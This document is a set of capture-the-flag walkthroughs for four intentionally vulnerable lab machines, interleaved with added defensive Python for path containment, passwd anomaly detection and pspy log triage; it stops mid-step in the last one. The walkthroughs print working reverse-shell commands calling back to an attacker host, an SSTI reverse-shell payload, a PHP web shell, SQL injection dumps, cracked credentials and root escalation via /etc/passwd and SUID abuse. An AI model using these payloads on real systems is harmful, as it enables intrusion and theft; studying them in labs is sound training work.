Vulnhub Pylington: 1 Walkthrough


https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                      
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt.

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit /zbir7mn240soxhicso2z to get a username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

Log in to get a Python IDE that blocks some strings. Build the blocked strings by concatenation and pass them to exec to get a reverse shell.

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In the home folder of user py, find typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check the source code of typing.cc and run ./typing to get py's password.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.

 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

SSH in as user py; in /home/py/secret_stuff, find backup.cc.

 [py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check the source code of backup.cc.

```
[py@archlinux secret_stuff]$ cat backup.cc
#include <iostream>
#include <string>
#include <fstream>

int main(){
    std::cout<<"Enter a line of text to back up: ";
    std::string line;
    std::getline(std::cin,line);
    std::string path;
    std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
    std::getline(std::cin,path);

    if(!path.starts_with("/srv/backups/")){
        std::cout<<"The file must be inside the /srv/backups directory!\n";
    }
    else{
        std::ofstream backup_file(path,std::ios_base::app);
        backup_file<<line<<'\n';
    }
    return 0;
}
```
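The check in backup.cc only compares a string prefix, so a path that starts with /srv/backups/ but climbs back out with .. components passes it. The Python below is an added example, not code from the VM or from this walkthrough: it puts the same prefix test next to a containment check that resolves the path before comparing, component by component. BACKUP_ROOT and the sample paths are assumptions for the demonstration.

```python
import os

BACKUP_ROOT = "/srv/backups"  # assumed backup directory, as in backup.cc


def prefix_check(path: str, root: str = BACKUP_ROOT) -> bool:
    """The test backup.cc performs: a bare string-prefix comparison.
    It accepts any string beginning with the root, including paths
    that leave the directory again through '..' components."""
    return path.startswith(root + "/")


def contained_check(path: str, root: str = BACKUP_ROOT) -> bool:
    """Hardened test: resolve '..' and symlinks in both the candidate and
    the root, then require the root to be a prefix of the candidate at
    path-component level rather than character level."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    try:
        # commonpath works on components, so '/srv/backups2/x' is not
        # mistaken for something inside '/srv/backups'.
        return os.path.commonpath([real_root, real_path]) == real_root
    except ValueError:  # raised when absolute and relative paths are mixed
        return False


def audit(paths):
    """Return {path: (prefix_result, contained_result)} so the two checks
    can be compared side by side on the same inputs."""
    return {p: (prefix_check(p), contained_check(p)) for p in paths}


if __name__ == "__main__":
    # Constructed sample inputs: a legitimate file, the traversal path used
    # in the walkthrough, and a sibling directory sharing the prefix.
    samples = [
        "/srv/backups/notes.txt",
        "/srv/backups/../../etc/passwd",
        "/srv/backups2/notes.txt",
    ]
    for p, (naive, strict) in audit(samples).items():
        print(f"{p:35} prefix={naive!s:5} contained={strict}")
```

The traversal path is accepted by prefix_check and rejected by contained_check; resolving the path before the comparison is the fix, and the same idea applies whatever language the program is written in.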


The check only tests the string prefix, so a path containing .. escapes /srv/backups. That means we can append a new user with root privilege to /etc/passwd.

[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

HackMyVm Ginger Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find the IP of the VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24
 ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan WordPress for vulnerabilities.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Search for the exploit in Exploit-DB.

 ~ searchsploit CP Multi View Event Calendar
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path
 ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt for the SQL injection point, then use sqlmap to dump the database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with John the Ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

Log in to WordPress as webmaster:sanitarium, open the plugin editor, and modify akismet.php to insert reverse shell code.

[image-20210609142750078.png]

Request the modified plugin file and catch the reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234
...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```


Found three users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster


Found a hint in sabrina's home folder.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory


Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch


Log in via SSH as sabrina and check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *


Check app.py: it is a Flask HTTP server on port 5000 with an SSTI vulnerability.

```
sabrina@ginger:~$ cat /opt/app.py

from flask import Flask, request, render_template_string,render_template

app = Flask(__name__)
@app.route('/')
def hello_ssti():
    person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template,person=person)
def get_user_file(f_name):
    with open(f_name) as f:
        return f.readlines()
app.jinja_env.globals['get_user_file'] = get_user_file

if __name__ == "__main__":
    app.run(debug=True)
```

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, use SSH to forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Visit the server with an SSTI payload.

```
127.0.0.1:5000/?name={{request.application.__globals__.__builtins__.__import__(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}
```


At the same time, listen with nc on that port and get a reverse shell as webmaster.

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)


Upload id_rsa.pub to /home/webmaster/.ssh, rename it to authorized_keys and chmod 600 it.

```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
cd /home/webmaster
webmaster@ginger:~$ mkdir .ssh
mkdir .ssh
webmaster@ginger:~$ cd .ssh
cd .ssh
webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
...
Saving to: ‘authorized_keys’
authorized_keys     100%[===================>]     565  --.-KB/s    in 0s
webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```

Now we can log in via SSH as webmaster.

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to the VM and run it.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh
```


UID 1002 is user caroline, and the /home/caroline/backup folder is writable by webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup


Write a reverse shell into /home/caroline/backup/backup.sh.

```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
webmaster@ginger:/home/caroline$ rm backup/backup.sh
rm: remove write-protected regular file 'backup/backup.sh'? yes
webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/
```

Then we get a reverse shell as caroline. Again, upload id_rsa.pub to get SSH access, and check sudo -l.

 caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble /srv/code: it just calls chmod to make /etc/passwd world-writable for 5 seconds.

```
int __cdecl main(int argc, const char **argv, const char **envp)
{
    system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
    return 0;
}
```


Within those 5 seconds, we append a new root user with a password hash to /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#
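Both this walkthrough and the Pylington one end by appending a root2 line to /etc/passwd, which leaves two traces a defender can check for: a second UID 0 account, and a hash sitting in the second field of passwd instead of in shadow. The Python below is an added example, not code from either walkthrough: it parses passwd content, reports those conditions, and checks whether the file is writable by group or others (the window /srv/code opens). The sample lines and PLACEHOLDER_HASH are constructed for the demonstration.

```python
import os
import stat

# Constructed sample of /etc/passwd content. The last line has the shape of
# the "root2" entry appended in the walkthroughs; the hash is a placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
caroline:x:1002:1002::/home/caroline:/bin/bash
root2:PLACEHOLDER_HASH:0:0:root:/root:/bin/bash
"""

# Second-field values that mean "hash lives in /etc/shadow" or "login disabled".
NO_HASH_MARKERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Split passwd content into (entries, malformed): each entry is a dict
    of the seven standard fields, malformed holds raw lines that do not parse."""
    entries, malformed = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            malformed.append(line)
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": gid, "gecos": gecos, "home": home, "shell": shell})
    return entries, malformed


def find_passwd_anomalies(text):
    """Return [(account, reason), ...] for the traces a passwd-file
    privilege escalation leaves behind."""
    entries, malformed = parse_passwd(text)
    findings = [(line, "malformed line") for line in malformed]
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        if e["pw"] not in NO_HASH_MARKERS:
            findings.append((e["name"], "password hash stored in passwd, not shadow"))
    return findings


def passwd_group_or_world_writable(path="/etc/passwd"):
    """True if group or others can write the file (the state /srv/code creates
    for five seconds), False if not, None if the file does not exist."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return None
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for account, reason in find_passwd_anomalies(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
    print("passwd writable by group/others:", passwd_group_or_world_writable())
```

On a real host, read /etc/passwd into find_passwd_anomalies; a clean system reports nothing, and the 5-second window from /srv/code is only caught by polling the mode check, which is why the binary itself (sudo NOPASSWD on a program that runs chmod on /etc/passwd) is the real finding.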

HackMyVm Ripper Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. "Old ssh connection files" suggests a file such as id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
```


Note that the VM's console screen shows the username jack.

[image-20210603115519124.png]

Download id_rsa.bak and try to connect over SSH; the key is passphrase-protected.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':


Use the following loop to brute-force the passphrase.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C "jack@192.168.56.100" -P "$pass" -f id_rsa.bak &>/dev/null; then echo "$pass"; break; fi; done
bananas


Log in as jack. After some enumeration, nothing useful was found.

Download linpeas from GitHub and upload it to the VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh


Run linpeas.sh; it finds a strange string.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No


It is the password of another user, helder.

Download pspy64 from GitHub (https://github.com/DominicBreuker/pspy), upload it to the VM, and watch system processes.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi


The shell command means: if /root/.local/helder.txt is equal to /home/helder/passwd.txt, the string read from port 10000 (say XXX) is used as a file name and the SUID bit is set on /usr/bin/XXX.

So we make passwd.txt a symbolic link to /root/.local/helder.txt and serve the string "bash" on port 10000. After a minute, /usr/bin/bash has the SUID bit set.

helder@ripper:~$ ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$ echo bash | nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash


Finally, get root.

```
helder@ripper:~$ /usr/bin/bash -p
helder@ripper:~$ id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
```
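The root cron job above (root reads a file under /home/helder and then runs chmod +s on a name it received over a socket) and the Ginger cron job (bash run on a script in a group-writable /home/caroline/backup) are exactly the kind of process activity a defender wants flagged automatically when reviewing pspy output. The Python below is an added example, not part of either walkthrough and not a feature of pspy: it parses lines in pspy's CMD format and applies a few rules, namely root touching a user-writable location, chmod granting a setuid/setgid bit or widening write permission, and an interpreter running a script from a user-writable path. The sample lines are constructed in the format of the captures above; the path prefixes and rule thresholds are my assumptions.

```python
import re

# Constructed sample of pspy output, in the line format of the walkthroughs'
# captures (date time CMD: UID=n PID=n | command).
SAMPLE_PSPY = """\
2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh
2021/06/09 04:33:02 CMD: UID=0 PID=890 | /usr/bin/find /var/log -name *.gz -delete
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s(?P<cmd>.*)$"
)
# Locations an unprivileged user can normally write to (assumed list).
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}
# chmod adding a setuid/setgid bit symbolically (+s, u+s, u+xs) or numerically (2xxx-7xxx).
SETUID_RE = re.compile(r"\bchmod\b[^;&|]*\s(?:[ugoa]*\+[rwxt]*s\b|[2-7][0-7]{3}\b)")
# chmod widening write permission (+w, o+w, go+w, a+w).
WIDEN_WRITE_RE = re.compile(r"\bchmod\b[^;&|]*\s[ugoa]*\+[rxst]*w\b")


def parse_pspy(text):
    """Return one dict per well-formed pspy line; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": m["ts"], "uid": int(m["uid"]),
                           "pid": int(m["pid"]), "cmd": m["cmd"]})
    return events


def triage(text):
    """Return [(pid, reason), ...] for events that deserve a closer look."""
    findings = []
    for ev in parse_pspy(text):
        cmd, argv, pid = ev["cmd"], ev["cmd"].split(), ev["pid"]
        if ev["uid"] == 0 and any(p in cmd for p in USER_WRITABLE):
            findings.append((pid, "root reads or executes a path under a user-writable directory"))
        if SETUID_RE.search(cmd):
            findings.append((pid, "chmod grants a setuid/setgid bit"))
        if WIDEN_WRITE_RE.search(cmd):
            findings.append((pid, "chmod widens write permission"))
        # Interpreter invoked directly on a script file (argv[1]) that lives
        # somewhere users can write; whoever can edit the script runs as the
        # invoking UID on the next scheduled run.
        if (len(argv) >= 2 and argv[0].rsplit("/", 1)[-1] in INTERPRETERS
                and argv[1].startswith(USER_WRITABLE)):
            findings.append((pid, "interpreter runs a script from a user-writable location"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_PSPY):
        print(f"PID {pid}: {reason}")
```

Run against a saved pspy capture, the Ripper cron job trips two rules (root reading under /home, and chmod +s) and the Ginger one trips the interpreter rule; the benign CRON and find lines produce nothing. The same rules translate directly into a crontab review: root jobs should not read, execute or chmod anything a lower-privileged user can modify.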

HackMyVm Momentum2 Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set a cookie and a parameter to upload a PHP file.

 cat ajax.php.bak
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1

Generate a dictionary file of candidate cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php containing a command shell.

 cat cmd.php
 <?php
 system($_GET["cmd"]);
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with Burp Suite.

[image-20210531210127178.png]

Send the request to Repeater, add the cookie "admin=xxx" (which we will brute-force later) and the parameter "secure=val1d". Note that the value is val1d, not valid. If we click Send now, the response is 0, which means the upload failed.

[image-20210531212540903.png]

Then send it to Intruder and mark the cookie value as the payload position: admin=§xxxxx§.

[image-20210531213130392.png]

Set the payload list to the cookie.txt we just generated.

[image-20210531213158667.png]

Click Start attack. The right cookie is the one whose response is 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check that cmd.php works.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now get a reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, find a password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

The asterisk mark (*) means any character, so we generate a dictionary with crunch.

```
